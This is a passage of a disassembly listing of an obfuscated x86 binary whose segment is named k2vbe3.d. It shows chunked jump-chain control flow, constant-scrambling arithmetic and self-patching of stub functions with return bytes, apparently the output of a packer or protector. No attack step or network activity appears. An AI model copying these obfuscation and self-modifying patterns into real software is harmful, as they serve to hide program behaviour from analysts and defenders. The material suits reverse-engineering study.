; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
		cmp	esi, ebp
		jmp	loc_457CD9
; ---------------------------------------------------------------------------

loc_440A32:				; DATA XREF: sub_440C94:loc_45021Bo
		push	ecx
		mov	ecx, eax

loc_440A35:				; CODE XREF: k2vbe3.d:004513E8j
		xchg	ecx, [esp]
		jmp	loc_455EE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_440A3D:				; CODE XREF: sub_44128Bj
		push	edx
		mov	edx, ebp
		jmp	loc_451E6E
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
		mov	edx, 65DE9EC5h
		push	esi
		push	0F2558493h
		pop	esi
		jmp	loc_4432C6
; ---------------------------------------------------------------------------

locret_440A56:				; CODE XREF: k2vbe3.d:loc_45532Cj
		retn
; ---------------------------------------------------------------------------

loc_440A57:				; CODE XREF: k2vbe3.d:0044C791j
		jmp	loc_43CC04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_440A5C:				; CODE XREF: sub_441409-3C2Dj
		jmp	sub_443A95
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		xchg	edi, [esp]
		mov	edx, edi
		pop	edi
		mov	eax, [esp]
		call	sub_45A502
; START	OF FUNCTION CHUNK FOR sub_44DD31

loc_440A6F:				; CODE XREF: sub_44DD31+DB29j
		jmp	nullsub_433
; END OF FUNCTION CHUNK	FOR sub_44DD31
; ---------------------------------------------------------------------------

loc_440A74:				; CODE XREF: k2vbe3.d:0043C911j
		jmp	loc_44DED2
; ---------------------------------------------------------------------------

loc_440A79:				; CODE XREF: k2vbe3.d:0044E177j
		jnz	loc_43E82E
		sbb	edx, eax
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_440A81:				; CODE XREF: sub_454E83:loc_458241j
		rol	eax, 1Bh
		xor	eax, 5B59A168h
		call	sub_4553CC
		mov	ds:dword_41E080, eax
		lea	eax, nullsub_3
; END OF FUNCTION CHUNK	FOR sub_454E83
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_440A9B:				; CODE XREF: sub_43C865:loc_45751Dj
		mov	byte ptr [eax],	0C3h
		jmp	loc_448660
; END OF FUNCTION CHUNK	FOR sub_43C865
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_440AA3:				; CODE XREF: sub_45A323:loc_45A381j
		jz	loc_44FE7D
		jmp	loc_44BDB6
; END OF FUNCTION CHUNK	FOR sub_45A323
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_393. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_440AAF:				; CODE XREF: sub_43D7A9+20DAj
		jnz	loc_447A1E
		jmp	loc_4540A4
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_152. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_440ABB:				; CODE XREF: sub_4597AE-10399j
		jmp	nullsub_327
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D863

loc_440AC0:				; CODE XREF: sub_44D863:loc_446253j
		and	eax, 2EA5621Eh
		or	eax, ds:4000EDh
		add	eax, 0FFE9A798h
		rol	eax, 17h
		xor	eax, 2835369Dh
		push	offset loc_43C607
		jmp	nullsub_458
; END OF FUNCTION CHUNK	FOR sub_44D863
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_521. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_440AE6:				; CODE XREF: sub_43DA1E+A3Aj
		pop	edi
		rol	edi, 0Eh
		cmp	edi, 771C94B0h
		jmp	loc_454A3E
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_440AF5:				; CODE XREF: sub_43D023:loc_44C437j
		jnz	loc_446B53
		jmp	loc_44B34F
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_440B00:				; CODE XREF: sub_454AD4:loc_441E23j
		lea	eax, nullsub_15
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_15
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
		call	nullsub_505
		jmp	ds:dword_41E0C8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_505. PRESS KEYPAD	"+" TO EXPAND]
		dw 9284h
		db 37h,	2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_440B1F:				; CODE XREF: sub_44A6BD:loc_44C126j
		jmp	loc_451270
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_440B24:				; CODE XREF: sub_44D298:loc_43E884j
		shr	edx, 3
		mov	ecx, ds:dword_43FA7C
		movzx	edx, byte ptr [ecx+edx]
		and	eax, edx
		jnz	loc_44A78F
		jmp	loc_44D051
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_440B3E:				; CODE XREF: sub_43FF90:loc_44513Ej
		jz	loc_447F60
		jmp	loc_4595E3
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------

loc_440B49:				; CODE XREF: k2vbe3.d:004419BEj
		jns	loc_44BC2E

; =============== S U B	R O U T	I N E =======================================



sub_440B4F	proc near		; CODE XREF: sub_454E69:loc_45409Ap

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00441A7E SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004431DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506A5 SIZE 00000006 BYTES

		xchg	eax, [esp+0]
		pop	eax
		ror	eax, 5
		jmp	loc_4431DB
sub_440B4F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA0B

loc_440B5B:				; CODE XREF: sub_43DA0B:loc_44B24Cj
		adc	eax, ebx
		jmp	loc_453261
; END OF FUNCTION CHUNK	FOR sub_43DA0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_440B62:				; CODE XREF: sub_4553CC:loc_453AC2j
					; DATA XREF: sub_44B94B:loc_44EDE7o
		cmp	dword ptr [eax], 47424454h
		jz	loc_44DE55
		jmp	loc_44C402
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_440B73:				; CODE XREF: k2vbe3.d:loc_440090j
		and	esi, 45B9B854h
		add	esi, 0BA8BF924h
		call	sub_4438F6
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_440B84:				; CODE XREF: sub_43F34C:loc_454CE4j
		sbb	edx, ebp
		jmp	loc_45A804
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_440B8B:				; CODE XREF: sub_45762D-BC0Fj
		jl	loc_45B150

loc_440B91:				; CODE XREF: sub_444BA0+Dj
		jmp	loc_43FC6A
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------
		adc	ebx, edi
		or	edi, 0E2FE8412h
		jnp	loc_456D0B
		jmp	loc_45B150
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_440BA9:				; CODE XREF: sub_44469A-7BACj
		add	ebp, 7FA20853h
		push	6D4B77BCh
		jbe	loc_4433F8

loc_440BBA:				; CODE XREF: sub_44469A:loc_45C07Ej
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_444632
		jmp	loc_45BCDE
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_440BCB:				; CODE XREF: sub_43EEC6+D9F7j
		not	esi

loc_440BCD:				; CODE XREF: sub_43EEC6:loc_44C8B3j
		rol	esi, 10h
		xor	esi, 0E068B95Ch
		and	esi, 0B9F5C73Bh
		jnz	loc_4467F6

loc_440BE2:				; CODE XREF: sub_44660F+1472Ej
		jmp	loc_444CAC
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------

loc_440BE7:				; CODE XREF: k2vbe3.d:00458EE5j
		jmp	loc_456D77
; ---------------------------------------------------------------------------
		mov	ebx, 0B26CBF13h
		jmp	loc_4467EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442700

loc_440BF6:				; CODE XREF: sub_442700:loc_442709j
		mov	eax, edx
		xchg	eax, [esp+0]
		nop
		push	8F2A986Bh
		pop	eax
		sub	eax, 0A917F34Ah

loc_440C08:				; CODE XREF: k2vbe3.d:loc_43C1BFj
		xor	eax, 89CCBFB0h
		call	sub_4553CC
		jmp	loc_43CF9B
; END OF FUNCTION CHUNK	FOR sub_442700
; ---------------------------------------------------------------------------
		push	offset sub_451B0D
		jmp	nullsub_434
; ---------------------------------------------------------------------------

loc_440C22:				; CODE XREF: k2vbe3.d:loc_44C81Ej
		jz	loc_44A5E6
; START	OF FUNCTION CHUNK FOR sub_453100

loc_440C28:				; CODE XREF: sub_453100-B62Bj
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_453100
; ---------------------------------------------------------------------------
		push	908AEED6h
		xchg	edx, [ebp+0]
		mov	ebp, edx
		mov	[esi], edx
		jmp	loc_44A5E6
; ---------------------------------------------------------------------------

loc_440C3E:				; CODE XREF: k2vbe3.d:loc_44B099j
		jnz	loc_442936
		jmp	loc_43D81D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BEA

loc_440C49:				; CODE XREF: sub_444BEA:loc_44946Fj
		and	ecx, 7
		mov	eax, 1
		shl	eax, cl
		push	745FF342h
		pop	edx
		sub	edx, 8EA06587h
		or	edx, 3A64564h
		jmp	loc_43C012
; END OF FUNCTION CHUNK	FOR sub_444BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_440C6A:				; CODE XREF: sub_44C90E-2F2j
		adc	ebp, 0A501ACC4h
		and	eax, ebx
		xor	eax, 387F5312h
		jmp	loc_4597F6
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_440C7D	proc near		; CODE XREF: sub_450740p
					; k2vbe3.d:0045B2A2j

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00440776 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00441A91 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044A8AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DE9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004591E9 SIZE 0000001A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	edx
		jz	loc_4591E9
		mov	eax, [esp-8+arg_4]
		push	edx
		push	edi
		mov	edi, ebx
		jmp	loc_441A91
sub_440C7D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_440C94	proc near		; DATA XREF: sub_43C206+6o

var_14		= byte ptr -14h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C64A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D05E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043D58A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043E814 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043F33D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F512 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440223 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004404EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440DA4 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00442B24 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442C39 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444739 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044619B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447D60 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00448E04 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044A89F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AE12 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BB21 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BD27 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C7D8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C96D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044CF7F SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044D24B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044E42D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044E6F1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EE83 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044EF65 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044F1D9 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F228 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FF55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FFBE SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00450005 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045020A SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00451956 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451DE4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452361 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004523E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004537FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004541E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454DD9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456249 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004565E9 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457AB5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045834B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004594E9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459E9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A599 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B92A SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045B9A1 SIZE 0000000B BYTES

		mov	ebp, esp
		push	ecx
		push	esi
		push	6DEBAC85h
		xchg	edi, [esp+0Ch+var_C]
		mov	esi, edi
		jmp	loc_44E42D
sub_440C94	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_440CA7:				; CODE XREF: sub_44F174:loc_446D0Cj
					; k2vbe3.d:00446D1Fj
		add	edx, 6D3DD3E3h
		xchg	edx, [esp+8+var_8]
		jmp	loc_44C3FD
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454354

loc_440CB5:				; CODE XREF: sub_454354:loc_451D23j
		not	edi
		ror	eax, 4
		or	ecx, 2E448E99h
		jmp	loc_442726
; END OF FUNCTION CHUNK	FOR sub_454354
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_440CC5:				; CODE XREF: sub_443E73:loc_44CAE9j
		push	edx
		push	esi
		push	49EB3FD6h
		or	esi, eax
		jmp	loc_4547CE
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4443DD

loc_440CD3:				; CODE XREF: sub_4443DD-5106j
		xchg	edi, [esp+10h+var_10]
		push	7CFBD27Ch
		call	sub_4552BE

loc_440CE0:				; CODE XREF: sub_451CCE+9B01j
		jmp	loc_459267
; END OF FUNCTION CHUNK	FOR sub_4443DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_440CE5:				; CODE XREF: sub_44B94B-77BBj
		jmp	loc_449B2B
; END OF FUNCTION CHUNK	FOR sub_44B94B

; =============== S U B	R O U T	I N E =======================================



sub_440CEA	proc near		; DATA XREF: k2vbe3.d:00455BF0o

; FUNCTION CHUNK AT 0043DACE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440A26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443B00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DEF4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004502A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004507DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004531B8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004536D5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453D2C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454D58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004575F4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457AF0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004588D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BB06 SIZE 0000000B BYTES

		test	al, al
		jz	loc_43DACE
		jmp	loc_454D58
sub_440CEA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_440CF7:				; CODE XREF: sub_45A323:loc_43E519j
		test	edx, 6610C84Eh
		jmp	loc_45B9E6
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_440D02:				; CODE XREF: sub_43DEBE+10CFCj
		jp	nullsub_116
		mov	ecx, [edx]
		shl	edi, 1Ch

loc_440D0D:				; CODE XREF: sub_43DEBE:loc_4460A1j
		push	0A1BDE72Dh
		pop	eax
		and	eax, 971AE149h
		xor	eax, 5B683E7Bh
		jmp	loc_457709
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E204

loc_440D24:				; CODE XREF: sub_43E204:loc_44BD05j
		xchg	ebp, [esp+4+var_4]
		mov	ecx, [esp+4+arg_8]
		mov	dword ptr [ecx], 10001h
		lea	eax, loc_443D4E
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		jmp	loc_441E61
; END OF FUNCTION CHUNK	FOR sub_43E204
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E647

loc_440D45:				; CODE XREF: sub_44E647-121E2j
		jz	loc_4562B7
; END OF FUNCTION CHUNK	FOR sub_44E647
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_440D4B:				; CODE XREF: sub_44F174+5C29j
		jmp	loc_43CBC1
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
		jle	loc_43D316
		mov	ebx, [esi]
		add	ebp, ecx
		jmp	loc_4562B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_440D5F:				; CODE XREF: sub_4597AE:loc_45A741j
		test	eax, 10h
		jmp	loc_44B4B9
; END OF FUNCTION CHUNK	FOR sub_4597AE

; =============== S U B	R O U T	I N E =======================================



sub_440D6A	proc near		; CODE XREF: k2vbe3.d:004542C9j
					; sub_444966+FAC6p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043FFF0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044DABA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045179A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452AC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457EE6 SIZE 00000013 BYTES

		xchg	edi, [esp+0]

loc_440D6D:				; CODE XREF: sub_451EB7:loc_44D044j
		pop	edi
		call	sub_4486D7
		push	ebp
		mov	ebp, ecx
		jmp	loc_452AC3
sub_440D6A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_440D7B	proc near		; CODE XREF: sub_452CF7:loc_459365j

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044061A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440758 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00441816 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449DCD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044EA72 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045218F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045281C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004531A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004544E6 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045648B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004569F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457B01 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045AFD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6DC SIZE 0000000D BYTES

		push	ebx
		mov	ebx, ebp
		xchg	ebx, [esp+0]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		xchg	ebx, [esp+4+var_4]
		mov	ebp, ebx
		jmp	loc_44EA72
sub_440D7B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E5DB

loc_440D90:				; CODE XREF: sub_44E5DB+15j
		or	esi, 1F982CADh
		add	esi, 204630B2h
		xchg	esi, [esp+0]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_44E5DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_440DA4:				; CODE XREF: sub_440C94:loc_4537FDj
		jz	loc_43D064
		jmp	loc_45834B
; ---------------------------------------------------------------------------

loc_440DAF:				; CODE XREF: sub_440C94+1E9Cj
					; k2vbe3.d:004588D1j
		add	eax, 0AFA64FBBh
		xchg	eax, [esp+0Ch+var_C]
		jmp	loc_44619B
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_440DBD:				; CODE XREF: sub_456C5F+5j
		pop	edi
		jb	loc_4545A0
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4507E3

loc_440DCD:				; CODE XREF: k2vbe3.d:004598C3j
		jmp	loc_44D8C8
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------

loc_440DD2:				; CODE XREF: k2vbe3.d:00451594j
		jmp	loc_456A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_440DD7:				; CODE XREF: sub_446E24+Cj
		jmp	loc_44F92A
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_440DDC:				; CODE XREF: sub_44DCF5-A565j
		jmp	loc_443F22
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C27A

loc_440DE1:				; CODE XREF: sub_45C27A:loc_451F23j
		rol	eax, 17h
		or	eax, 192E6DA0h
		js	loc_455C07
		and	esi, 0C73A2A71h
		and	eax, edx
		and	ebp, 0E8346DA3h
		or	edi, ebp
		jmp	loc_455C07
; END OF FUNCTION CHUNK	FOR sub_45C27A
; ---------------------------------------------------------------------------

loc_440E05:				; DATA XREF: sub_441D41+6F9o
		call	sub_44E4CE
		push	eax

loc_440E0B:				; CODE XREF: k2vbe3.d:004425BCj
		call	sub_44E299
		mov	edx, [ebp+8]
		mov	eax, [edx]
		jmp	loc_44E044
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_440E1A:				; CODE XREF: sub_448D7F:loc_4587B2j
					; k2vbe3.d:004587CEj
		xor	edx, 4EC917F6h
		test	edx, 20000h
		jmp	loc_43E9C0
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_440E2B:				; CODE XREF: sub_44B2D7:loc_458FF7j
		add	ecx, 2D6A1894h
		or	ecx, 342FEEF2h
		and	ecx, ds:4000EDh
		test	ecx, 8
		jmp	loc_457C5A
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_440E48:				; CODE XREF: sub_44B94B+8DFDj
					; sub_43E135:loc_454EA4j
		jo	loc_44FDB6
		mov	edi, 0D6F6A122h
		jmp	loc_440141
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B208

loc_440E58:				; CODE XREF: sub_44B208+6079j
		xor	edx, ecx
		adc	esi, eax

loc_440E5C:				; CODE XREF: sub_44B208:loc_44E6C9j
		call	sub_44128B
		mov	edx, 81424EE7h
		push	eax
		push	offset sub_453100
		jmp	nullsub_254
; END OF FUNCTION CHUNK	FOR sub_44B208

; =============== S U B	R O U T	I N E =======================================



sub_440E71	proc near		; DATA XREF: sub_443FC1+3572o

; FUNCTION CHUNK AT 0043D879 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441286 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044373E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF98 SIZE 00000006 BYTES

		push	0E2A3E896h
		pop	ecx
		add	ecx, 0A1C4C4FEh
		and	ecx, 79558D59h
		jmp	loc_44373E
sub_440E71	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_440E88:				; CODE XREF: k2vbe3.d:00446468j
		adc	ecx, 1D56CB83h

; =============== S U B	R O U T	I N E =======================================



sub_440E8E	proc near		; CODE XREF: sub_451AEE+6p

; FUNCTION CHUNK AT 00443E03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FE93 SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	ebp
		call	sub_441172

loc_440E98:				; CODE XREF: sub_456666-11952j
		jmp	loc_44FE93
sub_440E8E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_440E9D:				; CODE XREF: sub_445124-6601j
		jmp	loc_451683
; END OF FUNCTION CHUNK	FOR sub_445124

; =============== S U B	R O U T	I N E =======================================



sub_440EA2	proc near		; DATA XREF: sub_44B5DC+3o

; FUNCTION CHUNK AT 00455606 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A836 SIZE 00000006 BYTES

		mov	eax, [ebp-10h]
		mov	edx, eax
		push	eax
		push	9C86DF47h

loc_440EAD:				; CODE XREF: k2vbe3.d:00453EE6j
		pop	eax
		rol	eax, 1
		xor	eax, 0B29FA37Eh
		jmp	loc_455606
sub_440EA2	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_453. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454903

loc_440EBC:				; CODE XREF: sub_454903-C3AEj
		jmp	loc_45AF62
; END OF FUNCTION CHUNK	FOR sub_454903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442999

loc_440EC1:				; CODE XREF: sub_442999+18j
		mov	ebx, [eax+4]
		mov	eax, [eax]
		jnz	loc_4549ED
		retn
; END OF FUNCTION CHUNK	FOR sub_442999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_440ECD:				; CODE XREF: sub_4486D7+11746j
		jmp	loc_44155A
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_440ED2:				; CODE XREF: sub_450F71:loc_43F49Aj
		sub	edx, 0A1AF4280h
		jnb	loc_45494C
		jmp	loc_4437B0
; END OF FUNCTION CHUNK	FOR sub_450F71

; =============== S U B	R O U T	I N E =======================================



sub_440EE3	proc near		; DATA XREF: sub_44FDAC+806Do

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D401 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043DD71 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004421DA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442959 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00445476 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C33C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450C11 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00452A3E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458009 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		mov	ebx, edx
		pop	edx
		rol	ebx, 1Dh
		or	ebx, 311E6232h
		jmp	loc_4421DA
